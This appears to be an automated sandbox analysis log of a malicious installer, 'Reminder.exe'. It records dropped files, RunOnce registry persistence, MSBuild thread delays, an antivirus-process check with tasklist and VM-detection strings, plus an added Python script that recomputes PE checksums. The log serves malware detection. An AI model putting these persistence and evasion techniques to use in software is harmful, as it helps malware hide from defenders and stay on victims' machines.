Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll
Source: C:\edgheaa\AutoIt3.exe Section loaded: wsock32.dll
Source: C:\edgheaa\AutoIt3.exe Section loaded: version.dll
Source: C:\edgheaa\AutoIt3.exe Section loaded: winmm.dll
Source: C:\edgheaa\AutoIt3.exe Section loaded: mpr.dll
Source: C:\edgheaa\AutoIt3.exe Section loaded: wininet.dll
Source: C:\edgheaa\AutoIt3.exe Section loaded: iphlpapi.dll
Source: C:\edgheaa\AutoIt3.exe Section loaded: userenv.dll
Source: C:\edgheaa\AutoIt3.exe Section loaded: uxtheme.dll
Source: C:\edgheaa\AutoIt3.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
Source: C:\edgheaa\AutoIt3.exe Section loaded: wsock32.dll
Source: C:\edgheaa\AutoIt3.exe Section loaded: version.dll
Source: C:\edgheaa\AutoIt3.exe Section loaded: winmm.dll
Source: C:\edgheaa\AutoIt3.exe Section loaded: mpr.dll
Source: C:\edgheaa\AutoIt3.exe Section loaded: wininet.dll
Source: C:\edgheaa\AutoIt3.exe Section loaded: iphlpapi.dll
Source: C:\edgheaa\AutoIt3.exe Section loaded: userenv.dll
Source: C:\edgheaa\AutoIt3.exe Section loaded: uxtheme.dll
Source: C:\edgheaa\AutoIt3.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Window found: window name: TMainForm
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Reminder.exe Static file information: File size 5563800 > 1048576
Source: Reminder.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: Updater.exe, 00000023.00000003.2236885625.0000000004988000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240329494.0000000004B28000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407786329.0000000004BD8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2412148142.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000002.2500332732.0000000004C18000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497298647.0000000004A78000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Updater.exe, 00000023.00000003.2236885625.0000000004988000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240329494.0000000004B28000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407786329.0000000004BD8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2412148142.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000002.2500332732.0000000004C18000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497298647.0000000004A78000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006E310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 35_2_006E310D
Source: Reminder.exe Static PE information: real checksum: 0x5560c0 should be: 0x553d7f
Source: Reminder.tmp.0.dr Static PE information: real checksum: 0x0 should be: 0x343f79
Source: Reminder.tmp.2.dr Static PE information: real checksum: 0x0 should be: 0x343f79
Source: Reminder.exe Static PE information: section name: .didata
Source: Reminder.tmp.0.dr Static PE information: section name: .didata
Source: Reminder.tmp.2.dr Static PE information: section name: .didata
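The three "real checksum ... should be ..." lines above come from recomputing the PE image checksum over the file and comparing it with OptionalHeader.CheckSum; a zero field (both dropped Reminder.tmp copies) or a mismatch (Reminder.exe) means the file was modified after the checksum was written, or never had one. The following is an added example, not the sandbox's own code, that reproduces that check on a PE header constructed inline (the analysed sample is not embedded). Treat a mismatch as a weak signal on its own: the loader does not validate the checksum for ordinary user-mode executables, so plenty of legitimate builds ship with it wrong or zero.

```python
"""Reproduce the PE CheckSum comparison behind the report's "real checksum
... should be ..." lines (added example, not the sandbox's own code). The
image checksum is the ones'-complement style sum of the file with the
CheckSum field skipped, plus the file length. The PE below is constructed
inline and is not the analysed sample."""
import struct

def checksum_field_offset(data):
    """File offset of OptionalHeader.CheckSum, or None if data is not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # PE signature (4) + COFF file header (20); CheckSum sits at optional header + 0x40
    return e_lfanew + 4 + 20 + 0x40

def compute_pe_checksum(data):
    """Standard image checksum arithmetic (as in pefile's generate_checksum): dword
    sum with end-around carry, folded to 16 bits, plus the file size; the CheckSum
    dword itself is skipped so the result does not depend on the stored value."""
    cs_off = checksum_field_offset(data)
    if cs_off is None:
        raise ValueError("not a PE image")
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == cs_off:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    total &= 0xFFFF
    return (total + len(data)) & 0xFFFFFFFF

def stored_checksum(data):
    """The CheckSum value as written in the optional header."""
    return struct.unpack_from("<I", data, checksum_field_offset(data))[0]

def with_checksum(data, value):
    """Return a copy of data with the CheckSum field set to value."""
    off = checksum_field_offset(data)
    return data[:off] + struct.pack("<I", value) + data[off + 4:]

def verify(data):
    """Return (stored, computed, match). A zero stored value never matches, because
    the computed value is at least the file length."""
    stored, computed = stored_checksum(data), compute_pe_checksum(data)
    return stored, computed, stored == computed

def build_sample_pe():
    """Constructed minimal PE32 header plus filler bytes standing in for sections."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                             # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, 0xE0, 0x0102)    # i386, 1 section
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                               # PE32 magic; CheckSum left 0
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(range(256)) * 4

if __name__ == "__main__":
    pe = build_sample_pe()
    stored, computed, ok = verify(pe)
    print(f"real checksum: {stored:#x} should be: {computed:#x} ({'ok' if ok else 'mismatch'})")
    print("after patching the field:", verify(with_checksum(pe, computed))[2])
```

To run it against a real dropped file, pass the file's bytes to `verify`; the same function yields the "real ... should be ..." pair the report prints.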
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006F1046 push ecx; ret 35_2_006F1059
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B815D push 014B81A0h; ret 35_2_014B8198
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B815C push 014B81A0h; ret 35_2_014B8198
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B810D push 014B8139h; ret 35_2_014B8131
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B8105 push 014B8139h; ret 35_2_014B8131
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014A236D push 014A23BEh; ret 35_2_014A23B6
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014A4291 push ecx; mov dword ptr [esp], eax 35_2_014A4292
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014A25ED push 014A2619h; ret 35_2_014A2611
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B858D push 014B85D0h; ret 35_2_014B85C8
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B858C push 014B85D0h; ret 35_2_014B85C8
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014A25B5 push 014A25E1h; ret 35_2_014A25D9
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B2723 push 014B27D0h; ret 35_2_014B27C8
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B2725 push 014B27D0h; ret 35_2_014B27C8
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B27D5 push 014B2865h; ret 35_2_014B285D
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B67FD push 014B6829h; ret 35_2_014B6821
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B67A5 push 014B67F1h; ret 35_2_014B67E9
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B694B push 014B6979h; ret 35_2_014B6971
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B694D push 014B6979h; ret 35_2_014B6971
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B496D push 014B4999h; ret 35_2_014B4991
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B8971 push 014B899Dh; ret 35_2_014B8995
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B6985 push 014B69B1h; ret 35_2_014B69A9
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B686D push 014B6899h; ret 35_2_014B6891
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014A287D push 014A28A9h; ret 35_2_014A28A1
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B6835 push 014B6861h; ret 35_2_014B6859
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B68DD push 014B6909h; ret 35_2_014B6901
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B68A5 push 014B68D1h; ret 35_2_014B68C9
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014A28B6 push 014A2BB9h; ret 35_2_014A2BB1
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B4B69 push 014B4B95h; ret 35_2_014B4B8D
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B4B31 push 014B4B5Dh; ret 35_2_014B4B55
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B4BDA push 014B4C25h; ret 35_2_014B4C1D
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B4BF9 push 014B4C25h; ret 35_2_014B4C1D
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp File created: C:\Users\user\AppData\Local\Temp\is-9EGBF.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\Desktop\Reminder.exe File created: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp File created: C:\Users\user\AppData\Local\friend\Updater.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp File created: C:\Users\user\AppData\Local\Temp\is-BOC6S.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp File created: C:\Users\user\AppData\Local\Temp\is-BOC6S.tmp\_isetup\_isdecmp.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp File created: C:\Users\user\AppData\Local\friend\is-SBSAG.tmp
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp File created: C:\Users\user\AppData\Local\Temp\is-9EGBF.tmp\_isetup\_isdecmp.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe File created: C:\edgheaa\AutoIt3.exe
Source: C:\Users\user\Desktop\Reminder.exe File created: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp
Source: C:\Users\user\AppData\Local\friend\Updater.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fkccfcd
Source: C:\Users\user\AppData\Local\friend\Updater.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fkccfcd
Source: C:\Users\user\AppData\Local\friend\Updater.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fkccfcd
Source: C:\Users\user\AppData\Local\friend\Updater.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fkccfcd
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00762558 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 35_2_00762558
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006E5D03 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 35_2_006E5D03
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00D02558 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 38_2_00D02558
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C85D03 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 38_2_00C85D03
Source: C:\Users\user\Desktop\Reminder.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Reminder.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\edgheaa\AutoIt3.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 180000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 1106
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9EGBF.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BOC6S.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BOC6S.tmp\_isetup\_isdecmp.dll
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9EGBF.tmp\_isetup\_isdecmp.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe API coverage: 5.7 %
Source: C:\edgheaa\AutoIt3.exe API coverage: 5.7 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API coverage: 1.3 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3368 Thread sleep count: 1106 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3368 Thread sleep time: -33180000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2640 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3368 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073E180 GetFileAttributesW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 35_2_0073E180
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0074A187 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 35_2_0074A187
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0074A2E4 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 35_2_0074A2E4
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0074A66E FindFirstFileW,Sleep,FindNextFileW,FindClose, 35_2_0074A66E
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0074686D FindFirstFileW,FindNextFileW,FindClose, 35_2_0074686D
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073E9BA GetFileAttributesW,FindFirstFileW,FindClose, 35_2_0073E9BA
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_007474F0 FindFirstFileW,FindClose, 35_2_007474F0
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00747591 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime, 35_2_00747591
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073DE32 GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 35_2_0073DE32
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014A3ECD FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 35_2_014A3ECD
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014A17FD GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 35_2_014A17FD
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014A3FD5 FindFirstFileA,GetLastError, 35_2_014A3FD5
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CEA187 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 38_2_00CEA187
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CDE180 GetFileAttributesW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 38_2_00CDE180
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CEA2E4 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 38_2_00CEA2E4
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CEA66E FindFirstFileW,Sleep,FindNextFileW,FindClose, 38_2_00CEA66E
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CE686D FindFirstFileW,FindNextFileW,FindClose, 38_2_00CE686D
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CDE9BA GetFileAttributesW,FindFirstFileW,FindClose, 38_2_00CDE9BA
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CE74F0 FindFirstFileW,FindClose, 38_2_00CE74F0
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CE7591 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime, 38_2_00CE7591
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CDDE32 GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 38_2_00CDDE32
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_01653765 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 38_2_01653765
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_01651095 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 38_2_01651095
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_0165386D FindFirstFileA,GetLastError, 38_2_0165386D
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006E310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 35_2_006E310D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 180000
Source: Reminder.tmp, 00000001.00000002.1687750310.00000000007FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
